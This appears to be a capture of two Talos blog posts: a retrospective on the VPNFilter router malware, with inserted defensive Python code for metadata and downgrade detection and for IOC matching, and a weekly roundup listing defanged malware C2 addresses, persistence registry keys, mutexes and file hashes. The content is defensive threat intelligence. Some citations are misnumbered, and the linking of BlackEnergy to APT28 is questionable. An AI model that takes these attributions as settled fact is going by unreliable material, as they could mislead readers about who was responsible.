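        if marker == 0xDA:                            # start of scan: no more header segments
            break
        pos += 2 + seg_len
    raise ValueError("no Exif APP1 segment")


def hidden_addresses(tiff: bytes) -> list:
    """Return (tag, dotted-quad) pairs for IPv4-looking strings in any IFD0 value."""
    found = []
    for tag, data in parse_ifd0(tiff).items():
        for m in IPV4.finditer(data):
            found.append((tag, m.group().decode()))
    return found


def build_sample(text: str, tag: int = IMAGE_DESCRIPTION) -> bytes:
    """Constructed test image: little-endian TIFF with one out-of-line ASCII entry, wrapped as a JPEG."""
    payload = text.encode() + b"\x00"
    ifd_off = 8
    value_off = ifd_off + 2 + 12 + 4                  # header, count, one entry, next-IFD pointer
    tiff = (b"II" + struct.pack("<HI", 42, ifd_off)
            + struct.pack("<H", 1)
            + struct.pack("<HHII", tag, ASCII, len(payload), value_off)
            + struct.pack("<I", 0)
            + payload)
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8" + b"\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


if __name__ == "__main__":
    sample = build_sample("photo by user; see 203.0.113.7 for the album")
    print(hidden_addresses(tiff_from_jpeg(sample)))
```

The dotted-quad regex will also match version strings and similar, so hits need triage; the point of the walker is that a proxy or sandbox can pull every metadata value out of images fetched by a suspect device and look for command channels that a signature on the image bytes would never catch.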

By March 2018, additional malware samples were discovered that also reached out to Photobucket, and used toknowall.com as a backup in case Photobucket was unavailable. Analysing the malware samples showed that the threat actor let an important clue slip.

To keep important data within the malware confidential, the malicious code used encryption, implementing the RC4 algorithm. However, the code implementing this algorithm included a subtle error, a mistake identical to one exhibited by code used in the BlackEnergy attacks against Ukraine and elsewhere [5]. This code reuse from one attack to another allowed government agencies to identify that this attack originated from the group known as APT28 or “Sofacy” [6].

BlackEnergy and APT28


Each threat actor group has their own mode of operation, preferences, and characteristics that they display as part of their attacks. For example, Group 123 is known to conduct attacks by distributing documents that reference politics on the Korean peninsula [7]. In contrast, the threat actor Rocke seeks to install cryptocurrency mining software on compromised devices by downloading code from Git repositories [8]. Threat actors frequently reuse code or infrastructure, which allows researchers to identify specific threat actor groups and track their campaigns [9].

APT28, also known as Sofacy or Grizzly Steppe, is one of many threat actors that are followed by analysts. There is little doubt that this threat actor is part of the Russian Intelligence Services, that it is particularly active, and that it can cause chaos [10, 11].

The BlackEnergy attack was one of the most notorious attacks from this group. BlackEnergy disrupted electrical power distribution in Ukraine in December 2015, which caused widespread power outages across the country [7]. A particular characteristic of this attack was a component that wiped disks, rendering infected devices inoperable and destroying forensic evidence which could have been used to understand exactly how the attack was conducted [12].

This intent to destroy systems and prevent recovery was one of the factors that made it so important to respond to VPNFilter swiftly.

Capability and intent


VPNFilter managed to exploit various network devices and affected over 500,000 devices in at least 54 countries. The modular architecture of the malware allowed the threat actor to install various different modules to conduct different malicious activities from the infected devices.

At its simplest, the malware contained the ability to ‘brick’ or render permanently inoperable the infected devices. Alternatively, the malware could be used as a point of ingress on a network, and subsequently used to discover and attack other systems connected to the affected device. One particular module contained functionality to identify and monitor Modbus network traffic, a protocol widely used in Industrial Control Systems.

A further module allowed the malware to create a giant Tor network comprising the many compromised systems. This network potentially allowed attackers to disguise the ultimate destination of data stolen from other compromised systems, or the country of origin of attacks against systems.

Clearly, capturing data, especially usernames and passwords, was one goal of the attack. The malware was capable of downgrading encrypted https connections to an unencrypted http connection, then saving that traffic for future collection. Similarly, anything that looked like a user credential or authorisation token could be identified, recorded, and subsequently collected.
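The downgrade described above leaves a trace that a network sensor can look for: a client that has been reaching a host over TLS suddenly talking to the same host in plaintext. The following is an added example, not code from Talos or from the VPNFilter analysis; it assumes flow records reduced to (timestamp, client, server name, destination port), constructed here, and treats any plaintext flow to a host the same client previously reached on 443 as a lead worth reviewing.

```python
"""Added example: flag HTTPS-to-HTTP downgrades in constructed flow records."""
from collections import defaultdict

# Constructed flow records: (timestamp, client, server_name, dst_port).
# Server names would come from TLS SNI or the HTTP Host header on a real sensor.
FLOWS = [
    ("10:00:00", "10.0.0.5", "mail.example.test", 443),
    ("10:00:05", "10.0.0.5", "bank.example.test", 443),
    ("10:01:00", "10.0.0.5", "bank.example.test", 80),   # same client and host, now plaintext
    ("10:02:00", "10.0.0.9", "cdn.example.test", 80),    # never seen over TLS: no alert
    ("10:03:00", "10.0.0.5", "mail.example.test", 80),
]


def find_downgrades(flows):
    """Return (client, host, timestamp) for every plaintext HTTP flow to a host
    that the same client had earlier reached over TLS.

    Flows are processed in time order so that only a TLS session *preceding*
    the plaintext one counts; sites that legitimately serve both ports will
    show up too, so each hit is a lead for an analyst, not a verdict.
    """
    seen_tls = defaultdict(set)   # client -> hosts reached over 443 so far
    alerts = []
    for ts, client, host, port in sorted(flows):
        if port == 443:
            seen_tls[client].add(host)
        elif port == 80 and host in seen_tls[client]:
            alerts.append((client, host, ts))
    return alerts


if __name__ == "__main__":
    for client, host, ts in find_downgrades(FLOWS):
        print(f"{ts} {client} -> {host}: plaintext after prior TLS session")
```

The heuristic is deliberately narrow: it needs both a TLS flow and a later plaintext flow from the same client to the same name, which keeps it quiet on hosts that only ever speak HTTP.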

Since the malware infected routers, the devices that direct network traffic to its intended destination, it could modify routing information and create custom destinations for certain traffic, redirecting it from its genuine destination to a separate system under the control of the attackers. All of this was achieved without alerting the end user that anything was amiss.

The response


The number of affected systems grew throughout the spring of 2018, but sharp spikes in the number of new infections were observed on May 8 and 17. This sudden growth was almost exclusively within Ukraine, which pointed to preparation for an imminent attack.

At this point, Talos worked with partner organisations in the private and public sectors to neutralise the threat. The FBI led efforts to seize the C2 infrastructure [6], and in parallel, Talos informed members of the industry coalition group, the Cyber Threat Alliance, to ensure that the whole cyber security industry could act together to neutralise the threat [13].

The response was closely coordinated. Law enforcement took down the C2 infrastructure, cutting the ability of the attacker to send commands to the infected systems. The cyber security industry updated security products to detect and block VPNFilter, and issued advice to users on how to protect themselves.

We will never know the exact nature of the attack that was averted. The timing of the growth of infections suggested that Ukrainian Constitution Day on June 29, the anniversary of NotPetya on June 27, or Orthodox Pentecost Monday on May 28 may have been target dates. The Security Service of Ukraine suggested that the attack would have been timed to disrupt the UEFA Champions League Final, which was taking place in Kiev on May 26 [14].

Protection


VPNFilter partly resided in memory, and partly on the storage media of the devices it infected. Rebooting the device would clear the memory resident part of the malware, but not stop the malware component residing in the device storage from initiating contact with the command and control systems. However, once that C2 was disabled, the persistent part of the malware could no longer receive instructions.

The remnants of the malware can be cleared by resetting devices to factory settings, followed by patching to the latest version to remove vulnerabilities. Although it is still unclear which vulnerabilities were exploited to install VPNFilter, all the types of devices that were compromised had known existing vulnerabilities.

Given their position in the network topology, perimeter network devices are always going to be exposed to attack. Unpatched devices with known vulnerabilities that are exposed to the internet are ripe for compromise by threat actors such as APT28.

Keeping such devices fully patched and correctly configured is a vital part of network hygiene. However, if this can't be assured, then the devices need to be placed behind next-generation firewalls that detect and block the attacks before they reach the vulnerable device.

Vigilance is also part of good network hygiene. VPNFilter was first detected by identifying the unusual network behaviour of an infected device. The network is ideally placed to be the sensor that detects and informs us of the actions of the bad guys.

Conclusion & Aftermath


Together, Talos and the FBI worked to identify and characterise VPNFilter. The malware’s multi-stage modular platform supported both intelligence-collection and destructive cyber attack operations. The campaign managed to infect over 500 000 devices in at least 54 countries. This malware could have been used to conduct a large-scale destructive attack, which would have rendered infected physical devices unusable and cut off internet access for hundreds of thousands of users. However, identification and characterisation of the threat, coupled with a coordinated response across the public and private sectors, stopped the attack before a catastrophe occurred.

The degree of collaboration across different organisations was unprecedented. There is always a balance to tread between keeping information private in order to maintain operational security, and sharing between partners so that they can act together, maximising the impact against the threat actor and reducing the severity of an attack. There is evidence to suggest that Talos' early engagement of the Cyber Threat Alliance in the case of VPNFilter has had a lasting legacy, helping to encourage others to engage in earlier and more frequent sharing of data [13].

The various malicious modules identified for VPNFilter give us an insight into the objectives and desires of the threat actor. Notably, infecting routers allows the threat actor to reroute network traffic from the intended legitimate destination to a malicious destination under the control of the attacker. Potentially this ability can be used to collect further usernames and passwords, and also to conduct man-in-the-middle attacks by intercepting and reading network traffic before passing it on to the intended destination.

APT28 is only one example of the many threat actors who continue to attempt destructive attacks. Talos recently discovered the Sea Turtle campaign. Although the unknown threat actor behind that attack is different from APT28, they also sought to reroute internet traffic in order to conduct man-in-the-middle attacks and collect user credentials. However, they achieved their objectives by a completely different approach from VPNFilter, attacking the internet's DNS infrastructure [15].

Clearly, network infrastructure is in the sights of nation-state threat actors. We can expect that attackers will continue to seek to compromise these systems and continue to refine and develop the malware that they use to achieve their goals. Attackers can only learn from past failures. In the inevitable next wave of attacks, we can expect to see malware that leaves fewer traces in network traffic and has a more sophisticated C2 infrastructure that is more resistant to disruption.

The network is at the heart of our professional and social lives, and increasingly, our physical environment. The little devices that connect us to the network are often overlooked, but it is these systems that allow our critical national infrastructure and enterprises to function.

VPNFilter teaches us that attackers have not overlooked the importance of these systems, and that those who may be seeking to disrupt our societies look to strike at the network. However, in attempting to conduct this attack, the threat actors have let slip their technologies and the capabilities that they are trying to develop. These clues help us in knowing where to look and how to search for the next attack in preparation.

Talos continues to use its unparalleled visibility of threats to analyse the changing threat landscape and to act together with partners to protect customers. Nevertheless, cyber security is everyone’s concern. We all have our part to play in protecting against the next attack by ensuring that we have adequate security protection, and that all our devices connected to the network are kept updated and fully patched.

We don’t know what the next major attack will be, but we continue to search for the hints and clues of an impending attack, so that we can disrupt the activity and stop catastrophes before they happen.

References


[1]. The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations, US Department of Homeland Security. https://cyber.dhs.gov/assets/report/ar-16-20173.pdf
[2]. UK Internet Edge Router Devices: Advisory, UK National Cyber Security Centre. https://www.ncsc.gov.uk/information/uk-internet-edge-router-devices-advisory
[3]. Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices, US Department of Homeland Security. https://www.us-cert.gov/ncas/alerts/TA18-106A
[4]. Affidavit in Support of an Application for a Seizure Warrant, US District Court for the Western District of Pennsylvania. https://www.justice.gov/opa/press-release/file/1066051/download
[5]. New VPNFilter malware targets at least 500K networking devices worldwide, Talos. https://blog.talosintelligence.com/2018/05/VPNFilter.html
[6]. Justice Department Announces Actions to Disrupt Advanced Persistent Threat 28 Botnet of Infected Routers and Network Storage Devices, US Department of Justice. https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected
[9]. Groups, MITRE ATT&CK. https://attack.mitre.org/groups/
[10]. GRIZZLY STEPPE – Russian Malicious Cyber Activity, US Department of Homeland Security & Federal Bureau of Investigation. https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf
[11]. Reckless campaign of cyber attacks by Russian military intelligence service exposed, UK National Cyber Security Centre. https://www.ncsc.gov.uk/news/reckless-campaign-cyber-attacks-russian-military-intelligence-service-exposed
[12]. Cyber-Attack Against Ukrainian Critical Infrastructure, US Department of Homeland Security. https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01
[13]. Information Sharing in Action: CTA’s Incident Review of VPNFilter, Cyber Threat Alliance. https://www.cyberthreatalliance.org/information-sharing-action-cta-incident-review-vpnfilter/
[14]. The SBU warns of a possible large-scale cyberattack on state structures and private companies ahead of the Champions League final (via Google Translate), Security Service of Ukraine. https://ssu.gov.ua/ua/news/1/category/21/view/4823#.Xa4RX7cc.dpbs
[15]. DNS Hijacking Abuses Trust In Core Internet Service, Talos. https://blog.talosintelligence.com/2019/04/seaturtle.html

Threat Roundup for May 17 to May 24


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 17 and May 24. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
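The two paragraphs above make a point that is easy to lose when the indicator lists are pasted into a search: the roundup defangs every domain and IP with "[.]", the domains appear in mixed case, and a single hit is a lead rather than a verdict. The following is an added example, not code from Talos or from the roundup, of a small hunt helper that refangs indicators, matches them exactly (so that a longer IP is not a hit for a shorter one) and escalates a host only when indicators from more than one category agree. All indicator values, host names and log lines are constructed for the example.

```python
"""Added example (not part of the Talos roundup): match defanged IOCs against
log lines and require corroboration across categories before escalating."""
import re
from collections import defaultdict

# Indicators in the defanged form the roundup uses ("[.]" in place of ".").
# Every value here is constructed for the example, not taken from the lists above.
IOCS = {
    "domain": ["mail[.]example-smtp[.]test", "UPDATES[.]EXAMPLE-BAD[.]TEST"],
    "ip": ["198[.]51[.]100[.]23", "203[.]0[.]113[.]7"],
    "sha256": ["0" * 63 + "a"],
    "mutex": ["Global\\IDEADBEEF"],
}

# Constructed log lines in the form "<timestamp> <host> <event text>".
LOG_LINES = [
    "2019-05-24T10:00:01Z ws-017 dns query=mail.example-smtp.test",
    "2019-05-24T10:00:02Z ws-017 mutex created name=Global\\IDEADBEEF pid=4120",
    "2019-05-24T10:00:03Z ws-017 file written path=C:\\Users\\alice\\Downloads\\invoice.exe sha256=" + "0" * 63 + "a",
    "2019-05-24T10:05:00Z ws-042 dns query=updates.example-bad.test",
    "2019-05-24T10:06:00Z ws-099 connect dst=198.51.100.230:80",  # prefix of an IOC, not a hit
]


def refang(indicator: str) -> str:
    """Turn '198[.]51[.]100[.]23' back into the literal value that appears in logs."""
    return indicator.replace("[.]", ".")


def build_matchers(iocs):
    """Compile one case-insensitive regex per category.

    The look-around boundaries stop partial matches: 198.51.100.23 must not
    fire inside 198.51.100.230, and a domain must not match as a suffix of a
    longer name.
    """
    matchers = {}
    for category, values in iocs.items():
        alternatives = "|".join(re.escape(refang(v)) for v in values)
        matchers[category] = re.compile(
            r"(?<![\w.-])(" + alternatives + r")(?![\w.-])", re.IGNORECASE)
    return matchers


def scan(lines, iocs):
    """Return {host: {category: set(matched indicators)}} for every hit."""
    matchers = build_matchers(iocs)
    hits = defaultdict(lambda: defaultdict(set))
    for line in lines:
        host = line.split()[1]
        for category, rx in matchers.items():
            for m in rx.finditer(line):
                hits[host][category].add(m.group(1).lower())
    return hits


def triage(hits, min_categories=2):
    """A lone IOC is only a lead: escalate a host when indicators from at least
    two independent categories agree, otherwise queue it for analyst review."""
    return {host: ("escalate" if len(cats) >= min_categories else "review")
            for host, cats in hits.items()}


if __name__ == "__main__":
    for host, verdict in triage(scan(LOG_LINES, IOCS)).items():
        print(host, verdict)
```

With the constructed input, ws-017 (domain, mutex and hash all matching) is escalated, ws-042 (one domain lookup) goes to review, and ws-099 produces no hit at all because 198.51.100.230 is not 198.51.100.23.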

The most prevalent threats highlighted in this roundup are:

  • Doc.Downloader.Emotet-6971400-0
    Downloader
    Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
     
  • Win.Dropper.Kovter-6972554-0
    Dropper
    Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
     
  • Win.Dropper.Swisyn-6973984-0
    Dropper
    This family is packed and has anti-analysis tricks to conceal its behavior. The binaries drop other executables that are executed and try to inject malicious code in the address space of other processes.
     
  • Win.Malware.DarkComet-6973063-1
    Malware
    DarkComet and related variants are a family of Remote Access Trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
     
  • Win.Malware.Ursu-6977282-0
    Malware
    Ursu is a generic malware that has numerous functions. It contacts a C2 server and performs code injection in the address space of legitimate processes. It is able to achieve persistence and collect confidential data. It is spread via email.
     
  • Win.Malware.Zegost-6977492-1
    Malware
    Zegost, also known as Zusy, uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
     
  • Win.Packed.Shipup-6973041-0
    Packed
    This signature and IoCs cover the packed version of Shipup. These samples are packed and they gain persistence by creating a scheduled task to conduct their activities. Moreover, they inject malicious code in the address space of other processes and may hinder the analysis with anti-debugging and anti-vm checks.
     
  • Win.Ransomware.Razy-6972250-0
    Ransomware
    Razy is oftentimes a generic detection name for a Windows trojan. This malware typically collects sensitive information from the infected host, formats and encrypts the data, and sends it to a C2 server. In this case, the malware is functioning as ransomware, encrypting files with a .png, .txt, .html, or .mp3 file extension.
     
  • Win.Malware.AutoIT-6974564-1
    Malware
    This signature covers malware leveraging the well-known AutoIT automation tool, widely used by system administrators. AutoIT exposes a rich scripting language that allows one to write fully functional malicious software. This family will install itself on the system and contact a C2 server to receive additional instructions or download follow-on payloads.
     

Threats

Doc.Downloader.Emotet-6971400-0


Indicators of Compromise


Registry Keys | Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\sourcebulk | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK (Value Name: Type) | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK (Value Name: Start) | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK (Value Name: ErrorControl) | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK (Value Name: ImagePath) | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK (Value Name: DisplayName) | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK (Value Name: WOW64) | 2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SOURCEBULK (Value Name: ObjectName) | 2
Mutexes | Occurrences
Global\I98B68E3C | 2
Global\M98B68E3C | 2
rrtlnsuwfk | 2
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
191[.]92[.]69[.]115 | 2
90[.]57[.]69[.]215 | 2
37[.]9[.]175[.]14 | 2
107[.]6[.]16[.]60 | 1
209[.]237[.]134[.]156 | 1
123[.]125[.]50[.]138 | 1
12[.]6[.]148[.]4 | 1
172[.]217[.]6[.]211 | 1
91[.]93[.]119[.]93 | 1
203[.]199[.]83[.]4 | 1
18[.]209[.]113[.]128 | 1
104[.]244[.]42[.]195 | 1
204[.]52[.]196[.]123 | 1
67[.]195[.]197[.]75 | 1
96[.]118[.]242[.]233 | 1
195[.]186[.]227[.]53 | 1
17[.]56[.]136[.]171 | 1
107[.]152[.]26[.]215 | 1
137[.]118[.]27[.]84 | 1
199[.]180[.]198[.]140 | 1
216[.]117[.]4[.]25 | 1
75[.]177[.]169[.]225 | 1
78[.]188[.]7[.]213 | 1
207[.]44[.]45[.]27 | 1
115[.]71[.]233[.]127 | 1
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
tomasoleksak[.]com | 2
mail[.]amazon[.]com | 1
smtp[.]amazon[.]de | 1
SMTP[.]ANESA[.]MX | 1
smtp[.]hotmail[.]es | 1
MAIL[.]BYD[.]COM | 1
mail[.]att[.]com | 1
MAIL[.]TELMEX[.]COM | 1
smtp[.]cronosc[.]mx | 1
MAIL[.]AMAZON[.]FR | 1
smtp[.]tgc[.]us[.]com | 1
MAIL[.]SPROAJ[.]COM | 1
MAIL[.]HOTMAIL[.]CA | 1
MAIL[.]IKEA[.]GR | 1
mail[.]neurologyauctoresonline[.]org | 1
mail[.]dmforce01[.]de | 1
mail[.]payment[.]visa4uk[.]fco[.]gov[.]uk | 1
smtp[.]faithrv[.]com | 1
mail[.]dullstroom[.]net | 1
mail[.]infosync[.]ultipro[.]com | 1
mail[.]worldofficeonline[.]com | 1
SMTP[.]NKD[.]DE | 1
smtp[.]login[.]aliexpress[.]com | 1
SMTP[.]STCUSA[.]COM | 1
mail[.]rijeca[.]com | 1
See JSON for more IOCs
Files and or directories created | Occurrences
%HOMEPATH%\206.exe | 2
File Hashes
  • 06e4174bff2f35981dfd45e4376499761584cf0e87bc310e510c21a42e6cfa31
  • 09e81da7bfaa218857aa72793b86b2f3d3d4fd102e4282702bd524c45428833c
  • 11051f782981a2d9804cb8a373dd9e30a9b7d8f328167de13873498ed7f98674
  • 144b230733e25b20edabe39bad87913afed9279d4bde2f9b557d8a06c0cf53d7
  • 1d174cf281f20a5f318e24b5df536ff2d04d6ea854a81d8d45a519cf3ca60ac2
  • 1e9e79487ef3adba5aad25a1784a828f73112435d43581734998339f184ccfe8
  • 1f33d167cd705d1e19f8b7fb8ed5ed1c08b89bff6738b0e0264174396aa6fc15
  • 321a3f3b901c2f33206a7306778da305454dd0a4c35cad55f2082996958ff6ff
  • 3257cfc9caf85ca8dafb76c69f6c2744b33cd46b7d9b119fdddd78694848d358
  • 3299e6f7204ea1a44782d496c99329b76218b70233892426c02f872221548784
  • 37a8f9312cbc6314a69d480c19287b0c41de1f346a301d0d9e07d95da178b94d
  • 3ba1cad4f797c189510cbffa728b2b1b85ad1400d5ecbee223e262f03acf0443
  • 400a5d6d21230c8fe91fed9cb2fa2ddae199cfa892462281452b106bd219a782
  • 47413a4ab923acaf1bb2ac8eccfd9a1a66d282fa0b3731ddf2d062bcc2b58f70
  • 4821d11f5f6c1d360fb783467ccf365e9e9d412b9d63e262004e592bf8083d03
  • 4d9b585b5bb977301647ee51bffa8dc42b2f2ef1568a1693cada306de09d134d
  • 5b4be5216d7eb192ca92a660ecb8fb86adae5da2727485141e9e9f02d6a24544
  • 6665273fb05925bc755b1ee27eb962d49991f2d7926821ac019bb89a3384f745
  • 6b455aa9464a18e44571793fb467505e6a50d5881bff86e79043fed5e9216d6c
  • 706373653bea1bfd1d577a640e2942a16d064636f6a9aec85b58da3b0cb7ce2b
  • 724c3189c486f06b9090c094256d1ff91fd4e235ccc39a0bd96dfd1b9e2e91e7
  • 75f8716c14b028fee42ba751d4aae0ececdead291572bc36b8f9afeb1e71fb0b
  • 78e448a30db3d7d86c655281ccecf72f12107d1cbd3c4c989103cf3401d65e9c
  • 7ad693a3fd9da1b97c0e7f85fb37bf15f511168d2aa397ffcd4d0f3aeacc84db
  • 7e88b184d97bee19296f2430cb932847db7c77f51d27561bbe88230a2417fff1
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid

Malware

Win.Dropper.Kovter-6972554-0


Indicators of Compromise


Registry Keys | Occurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE (Value Name: DisableOSUpgrade) | 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE (Value Name: ReservationsAllowed) | 25
<HKLM>\SOFTWARE\WOW6432NODE\XVYG (Value Name: xedvpa) | 25
<HKCU>\SOFTWARE\XVYG (Value Name: xedvpa) | 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN (Value Name: ssishoff) | 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate | 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUpgrade | 25
<HKCU>\SOFTWARE\xvyg | 25
<HKLM>\SOFTWARE\WOW6432NODE\xvyg | 25
<HKCR>\7b5078f | 25
<HKCR>\7B5078F\shell | 25
<HKCR>\7B5078F\SHELL\open | 25
<HKCR>\7B5078F\SHELL\OPEN\command | 25
<HKCR>\.16a05d4e | 25
<HKCR>\.16A05D4E | 25
<HKCR>\7B5078F\SHELL\OPEN\COMMAND | 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 (Value Name: CheckSetting) | 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 (Value Name: CheckSetting) | 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 (Value Name: CheckSetting) | 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.102 (Value Name: CheckSetting) | 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.104 (Value Name: CheckSetting) | 25
<HKLM>\SOFTWARE\WOW6432NODE\XVYG (Value Name: svdjlvs) | 25
Mutexes | Occurrences
EA4EC370D1E573DA | 25
A83BAA13F950654C | 25
Global\7A7146875A8CDE1E | 25
B3E8F6F86CDD9D8B | 25
\BaseNamedObjects\408D8D94EC4F66FC | 23
\BaseNamedObjects\Global\350160F4882D1C98 | 23
\BaseNamedObjects\053C7D611BC8DF3A | 23
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
76[.]178[.]30[.]160 | 1
104[.]206[.]242[.]181 | 1
102[.]163[.]142[.]253 | 1
30[.]225[.]184[.]221 | 1
124[.]252[.]58[.]53 | 1
101[.]97[.]177[.]118 | 1
191[.]246[.]151[.]160 | 1
196[.]95[.]102[.]96 | 1
112[.]165[.]89[.]87 | 1
76[.]194[.]40[.]50 | 1
223[.]86[.]178[.]79 | 1
68[.]130[.]198[.]26 | 1
130[.]62[.]249[.]13 | 1
21[.]192[.]27[.]192 | 1
81[.]122[.]170[.]69 | 1
159[.]33[.]113[.]193 | 1
158[.]223[.]237[.]32 | 1
121[.]154[.]29[.]121 | 1
53[.]124[.]76[.]212 | 1
39[.]77[.]6[.]39 | 1
61[.]16[.]172[.]165 | 1
174[.]223[.]23[.]225 | 1
223[.]163[.]24[.]62 | 1
31[.]41[.]82[.]151 | 1
181[.]83[.]42[.]248 | 1
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
www[.]cloudflare[.]com | 1
www[.]weibo[.]com | 1
time[.]earleco[.]com | 1
www[.]bvihouseasia[.]com[.]hk | 1
www[.]bvi[.]org[.]uk | 1
www[.]bvifsc[.]vg | 1
www[.]bvitourism[.]com | 1
bvifinance[.]vg | 1
service[.]weibo[.]com | 1
www[.]fiabvi[.]vg | 1
www[.]vishipping[.]gov[.]vg | 1
www[.]bvi[.]gov[.]vg | 1
Files and or directories created | Occurrences
%LOCALAPPDATA%\39b0373 | 25
%LOCALAPPDATA%\39b0373\6a5cc64.16a05d4e | 25
%LOCALAPPDATA%\39b0373\7cbdf29.bat | 25
%APPDATA%\9d0423c | 25
%LOCALAPPDATA%\39b0373\a0ed4db.lnk | 25
%APPDATA%\9d0423c\da4e6c9.16a05d4e | 25
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\2ff4672.lnk | 25
%HOMEPATH%\Local Settings\Application Data\25013c37\1ffa0202.41d68cee7 | 23
%HOMEPATH%\Local Settings\Application Data\25013c37\aae7a32b.bat | 23
%APPDATA%\544d89dc\bf4dd39b.41d68cee7 | 23
%HOMEPATH%\Local Settings\Application Data\25013c37\5f60f76a.lnk | 23
%HOMEPATH%\Start Menu\Programs\Startup\b24d2b96.lnk | 23
\REGISTRY\MACHINE\SOFTWARE\Classes\exefile | 2
%APPDATA%\95df7\dc6f5.28e5d9 | 1
%HOMEPATH%\Local Settings\Application Data\cf335\03b2a.lnk | 1
%HOMEPATH%\Local Settings\Application Data\cf335\1a396.28e5d9 | 1
%HOMEPATH%\Local Settings\Application Data\cf335\7b80b.bat | 1
%HOMEPATH%\Start Menu\Programs\Startup\1f9af.lnk | 1
File Hashes
  • 0351e09f784933d3d59fe025b748e1d3fc01f545cf5dde505b034377794962c4
  • 13d0ed2b542e6c09376adc96e9c4ef0e862727d24cbf39c6185cd8d9712c44bf
  • 13da1a72b70ab0c78d9f1844fe5ad097e1235af32bea2f06935e32cce8e04d41
  • 220e48a66788b6dadb06f6d326233b21694593b02140c8489dc951709a871bc1
  • 23ae65200c6e2b11f1dfa4dc42355c2c161faa264cebe7fa62222f337a9e53f1
  • 252de3df03b74bab9f82fe47cd809b5c3d9b86882b32a225c4abb3f9ddce955e
  • 33d0abf301d6b4857c61e0f4d60b6a21c8ebe155731f3a737383f5f0fc055ad4
  • 34a1ef0084d90a55ce19aa7bc0d17358247e6e3e9416b46291cb84e1b8414cef
  • 35c9b57f3f5bffb0b1280901df5a8b4ab7fc76f453af1f72f336dad500648807
  • 38011d4c3afaf9bb10fce05788089845a0d86edcc5424295ac3e0345d9795a59
  • 39645016e9e74423955e24f235592ee22d48216873c6ad0abd67a57f87874af0
  • 406a5b73c768d019808c2a779729b47d181fec402073f58ab07afc9630904198
  • 43b3719228bb8b06e6981a2829b7920629ce1d3a650ccdf7813befe22616c3c0
  • 57efc6fe6c36fcdac92f6210b006eac42f9ea53133f6df81a73bba822062e44d
  • 5919b89bd4a14677da09b349d7aeeff86ba8fe690d30ce12bd55e69300393ef1
  • 5e19b3dbc319fd8408280b4d886c9eeceffe7091151ef2b9cf5794840dd8a674
  • 640878f3ea0254adcffe4ca564048ebe1a49a22b4821820d98a28c6f93529bc8
